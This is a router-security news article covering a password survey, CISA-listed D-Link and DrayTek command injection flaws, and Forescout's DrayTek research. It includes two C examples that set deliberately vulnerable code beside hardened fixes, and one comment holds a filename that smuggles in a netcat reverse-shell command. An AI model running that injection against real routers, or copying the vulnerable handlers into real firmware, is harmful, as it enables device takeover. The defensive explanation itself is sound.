If you are reading this, you may unknowingly be leaving yourself vulnerable to hackers. Recent research indicates that a staggering 86% of broadband users have never changed the factory default administrator password on their router, a figure security experts consider extremely concerning and one that points to a wider gap in basic device security awareness. Here’s why this matters and the immediate steps you should take to protect yourself.
The Broadband Genie Router Security Survey offers alarming insight into the security practices, or lack of them, of internet users. The survey, designed to track how router security attitudes have shifted since similar surveys in 2018 and 2022, gathered responses from more than 3,000 users. It found that 52% have never logged into their router’s settings at all, leaving the device exactly as it shipped. More troubling still, 86% admitted they have never changed the factory-set administrator password. The researchers read these figures as a decline in cybersecurity awareness among broadband users since the earlier surveys.
For someone who spends significant time educating non-technical audiences about essential security hygiene, this trend is disheartening. The need to change your router’s default admin password should be the first action taken when setting up the device.
“Leaving the password as the default is the easiest way for someone to gain access to your router and, therefore, your network and connected devices,” warned Alex Toft, Broadband Genie’s broadband expert. “It’s an open invitation to nefarious characters to snoop around and take what’s yours.” Once you set a strong password, you should only need to change it if it has been compromised.
The urgency of this advice is lower if your router is a newer model shipped with a per-device admin password rather than a shared default common to every unit of that model. Even then, if the printed password is short or guessable, it is prudent to change it. The survey also found poor habits around Wi-Fi passwords: 72% of users said they never change theirs. For many users this is not an immediate risk, but it remains good practice. “Similar to the router admin password, default Wi-Fi passwords are well known,” Toft noted. “It would take seconds for a knowledgeable hacker to gain access.”
Passwords are not the only areas where users exhibit a lack of vigilance. A staggering 89% of respondents said they never update their router firmware, which is one of the most concerning findings from a security standpoint. This represents a slight increase from the 2022 survey, suggesting that the message about the importance of updates is not resonating strongly enough. “Failing to update can leave routers vulnerable,” Toft cautioned. “This result isn’t the one we wanted to see.” Although updating router firmware can be complex, newer routers are simplifying the process by implementing automatic updates.
“Cybercriminals take advantage of bugs and vulnerabilities in firmware to gain access to your online information,” said Oliver Devane, a senior security researcher at McAfee. “Keeping the firmware up to date with the latest security patches will prevent this from happening.”
To address these oversights, Broadband Genie researchers recommend that every router owner take the following steps now, using the vendor’s instructions or asking your internet service provider for help:
- Disconnect the router from the internet and perform a full factory reset.
- Before reconnecting, change the router admin password, the Wi-Fi password and the network name (SSID) to unique values. A factory reset restores the default credentials, so this step must not be skipped or postponed.
The Cybersecurity and Infrastructure Security Agency (CISA) in the United States has also added two actively exploited router vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog, which obliges federal civilian agencies to apply the vendor mitigations under Binding Operational Directive 22-01. While that mandate legally binds only federal civilian executive branch agencies, CISA urges all organizations to consult the catalog to stay informed about ongoing threats and to fold its entries into their vulnerability management programs.
CISA adds entries to the catalog only on evidence of active exploitation, and each entry carries a due date by which federal agencies must remediate (three weeks after addition, as for these two). The two new entries affect routers from D-Link and DrayTek, and both are operating system command injection flaws. According to CISA, such vulnerabilities “pose significant risks” and are “frequent attack vectors for malicious cyber actors.”
CVE-2023-25280 is an OS command injection vulnerability in D-Link DIR-820 routers that lets a remote, unauthenticated attacker obtain root privileges with a crafted payload. Whether it has been used in ransomware campaigns is unknown. Because the model is end-of-life and will not receive a fix, CISA recommends retiring it, and consulting D-Link’s security advisories.
CVE-2020-15415 affects DrayTek Vigor3900, Vigor2960 and Vigor300B routers: a request with the text/x-python-script content type can carry shell metacharacters in a filename, which the device passes to a shell, giving remote command execution. CISA advises applying the mitigations outlined by the vendor, with further security guidance available from DrayTek.
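To make the DrayTek flaw concrete: the pattern behind this class of bug is a CGI handler that splices an attacker-supplied filename into a shell command line. The C fragment below is an added illustration written for this article, not DrayTek’s or D-Link’s code, and the handler names, paths and request details are assumptions. It shows the vulnerable form beside a hardened one that validates the name and runs the helper binary without a shell.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>

/* Constructed example of an upload handler on an embedded web UI.
 * Paths and names are illustrative, not taken from any real firmware. */

/* VULNERABLE: the filename from the request is interpolated into a shell
 * command. system() hands the whole string to /bin/sh, so a filename such as
 * "x.py; nc -e /bin/sh 10.0.0.1 4444" runs the attacker's command as the
 * web server's user (root on most consumer routers). */
int save_upload_vulnerable(const char *filename) {
    char cmd[512];
    snprintf(cmd, sizeof cmd, "mv /tmp/upload/%s /flash/scripts/", filename);
    return system(cmd);   /* shell parses ';', '|', '`', '$(...)' in filename */
}

/* True if the string contains anything a POSIX shell would interpret. */
int has_shell_metachars(const char *s) {
    return strpbrk(s, ";|&`$()<>{}[]*?~!'\"\\ \t\n") != NULL;
}

/* Allowlist: [A-Za-z0-9._-], no leading dot, no '/' (so no traversal),
 * bounded length. Rejecting is safer than trying to escape. */
int is_safe_filename(const char *name) {
    size_t n = strlen(name);
    if (n == 0 || n > 64 || name[0] == '.') return 0;
    for (size_t i = 0; i < n; i++) {
        unsigned char c = (unsigned char)name[i];
        if (!(isalnum(c) || c == '.' || c == '_' || c == '-')) return 0;
    }
    return 1;
}

/* HARDENED: validate first, then fork/execv with the filename as a single
 * argv element. No shell is involved, so metacharacters are never parsed.
 * Returns the child's exit status, or -1 on rejection or failure. */
int save_upload_hardened(const char *filename) {
    if (!is_safe_filename(filename)) return -1;
    char src[128];
    snprintf(src, sizeof src, "/tmp/upload/%s", filename);
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        char *const argv[] = {"/bin/mv", src, "/flash/scripts/", NULL};
        execv(argv[0], argv);
        _exit(127);           /* only reached if execv failed */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```

The fix is two-fold and both halves matter: the allowlist stops the injected string from reaching the command at all, and the exec-without-shell means that even a bug in the allowlist cannot turn a filename into a second command. Percent-decoding and multipart parsing, which real handlers do before this point, are omitted.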
Additionally, research released on October 2 by Vedere Labs at Forescout Research identified 14 new vulnerabilities in DrayTek routers. The report, titled “DRAY:BREAK Breaking Into DrayTek Routers Before Threat Actors Do It Again” and authored by Stanislav Dashevskyi and Francesco La Spina, describes two critical vulnerabilities (one with the maximum severity score of 10, the other rated 9.1), nine rated high and three rated medium. The researchers counted roughly 704,000 DrayTek routers with their web interface exposed to the internet across 168 countries, exposing their owners to distributed denial of service attacks, botnet recruitment and ransomware. Around 425,000 of those routers are in the U.K. and EU, more than 190,000 are in Asia, and only about 7,200 are in North America.
Forescout highlighted that DrayTek routers are particularly attractive to cybercriminals due to their widespread use across various industries. “Routers are crucial for keeping internal systems connected to the outside world, yet too many organizations overlook their security until they are exploited by attackers,” stated Barry Mainz, Forescout CEO. “Cybercriminals work around the clock to find cracks in routers’ defenses, using them as entry points to steal data or cripple business operations.”
The two flaws in the CISA catalog are OS command injections that lead to remote code execution. The issues Vedere Labs reported in DrayTek firmware are broader, and include:
- The same admin credentials were used across the entire system, including guest and host operating systems. If obtained, these credentials could lead to a complete system compromise.
- The “GetCGI()” function in the Web UI was vulnerable to a buffer overflow when processing query string parameters.
- Several buffer overflow issues in the Web UI arose from missing bounds checks when handling CGI form parameters.
- The web server backend for the Web UI seeded OpenSSL’s PRNG for TLS with a static string. A fixed seed makes the generator’s output the same on every device and every boot, so keys and nonces that should be unpredictable are not, potentially allowing attackers to recover information and mount man-in-the-middle attacks.
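The second and third items above, buffer overflows from missing bounds checks on query-string and form parameters, are the most common memory-safety bug in embedded web servers. The C fragment below is an added example written for this article, not DrayTek’s GetCGI() or any other vendor code; the function names and the 32-byte buffer size are assumptions. It pairs an unbounded lookup with a bounded one that reports an over-long value instead of writing past the buffer.

```c
#include <stdio.h>
#include <string.h>

/* Constructed example of a query-string parameter lookup on an embedded
 * web server. Not taken from any real firmware. */

#define VALUE_MAX 32   /* assumed size of the caller's stack buffer */

/* VULNERABLE: copies the value into the caller's buffer with no length
 * check. A request like GET /cgi-bin/login?user=AAAA...(200 bytes) writes
 * past out[] into adjacent stack memory, including the saved return address.
 * Shown for contrast only; never call it on attacker-controlled input. */
void get_cgi_vulnerable(const char *query, const char *key, char *out) {
    size_t klen = strlen(key);
    const char *p = query;
    while (p && *p) {
        if (strncmp(p, key, klen) == 0 && p[klen] == '=') {
            p += klen + 1;
            while (*p && *p != '&') *out++ = *p++;   /* unbounded copy */
            *out = '\0';
            return;
        }
        p = strchr(p, '&');
        if (p) p++;
    }
    *out = '\0';
}

/* HARDENED: the caller passes the buffer size, and a value that does not
 * fit is rejected rather than silently truncated, so the failure is visible
 * (and can be logged) instead of becoming a memory-safety bug.
 * Returns the value length, -1 if the key is absent, -2 if it does not fit. */
int get_cgi_bounded(const char *query, const char *key, char *out, size_t outsz) {
    size_t klen = strlen(key);
    const char *p = query;
    if (outsz == 0) return -2;
    while (p && *p) {
        if (strncmp(p, key, klen) == 0 && p[klen] == '=') {
            const char *v = p + klen + 1;
            const char *end = strchr(v, '&');
            size_t vlen = end ? (size_t)(end - v) : strlen(v);
            if (vlen >= outsz) { out[0] = '\0'; return -2; }   /* room for NUL */
            memcpy(out, v, vlen);
            out[vlen] = '\0';
            return (int)vlen;
        }
        p = strchr(p, '&');   /* advance to the next key=value pair */
        if (p) p++;
    }
    out[0] = '\0';
    return -1;
}

/* Self-check on constructed requests: a normal login query and one whose
 * "user" value is 199 bytes, far beyond VALUE_MAX. Returns 1 if the
 * bounded parser behaves as documented. */
int cgi_selfcheck(void) {
    char out[VALUE_MAX];
    char longval[200];
    char query[256];
    memset(longval, 'A', sizeof longval - 1);
    longval[sizeof longval - 1] = '\0';
    snprintf(query, sizeof query, "user=%s&lang=en", longval);

    if (get_cgi_bounded("user=admin&lang=en", "user", out, sizeof out) != 5) return 0;
    if (strcmp(out, "admin") != 0) return 0;
    if (get_cgi_bounded("user=admin&lang=en", "lang", out, sizeof out) != 2) return 0;
    if (get_cgi_bounded("user=admin", "pass", out, sizeof out) != -1) return 0;
    if (get_cgi_bounded(query, "user", out, sizeof out) != -2) return 0;
    return 1;
}
```

The same over-long request passed to get_cgi_vulnerable() is the crash (or, with a crafted payload, the code execution) the report describes; passed to get_cgi_bounded() it is an error code the handler can turn into a 400 response and a syslog line. Percent-decoding is left out so the length logic stays visible.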
In total, the vulnerabilities discovered by Vedere Labs affected 24 models of DrayTek routers, with 11 already reaching their end-of-life status. The report indicated that 63% of the exposed devices were either at end-of-sale or end-of-life, complicating the process of patching and protecting against potential exploits.
The positive takeaway is that researchers acted responsibly by disclosing these vulnerabilities to DrayTek promptly. As part of this responsible disclosure process, DrayTek has since patched all firmware vulnerabilities identified by Vedere Labs. “To safeguard against these vulnerabilities, organizations must immediately patch affected DrayTek devices with the latest firmware,” cautioned Daniel dos Santos, head of security research at Forescout Research Vedere Labs. “Disabling unnecessary remote access, implementing access control lists and two-factor authentication, and monitoring for anomalies through syslog logging are all crucial steps.”